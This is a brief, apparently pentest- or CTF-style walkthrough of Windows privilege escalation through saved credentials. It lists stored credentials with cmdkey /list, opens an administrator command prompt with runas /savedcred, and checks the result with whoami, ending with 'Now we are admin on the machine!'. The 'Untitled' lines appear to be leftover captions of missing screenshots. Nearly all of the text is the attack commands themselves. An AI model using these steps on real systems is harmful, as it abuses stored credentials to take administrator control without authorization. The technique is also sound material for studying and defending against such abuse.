First: listing all the creds we have

cmdkey /list

Untitled

Second: Open a session as Administrator from saved credentials

runas /savedcred /user:admin cmd.exe

Untitled

Third: Run whoami on the new CMD session

whoami

Untitled

Now we are admin on the machine!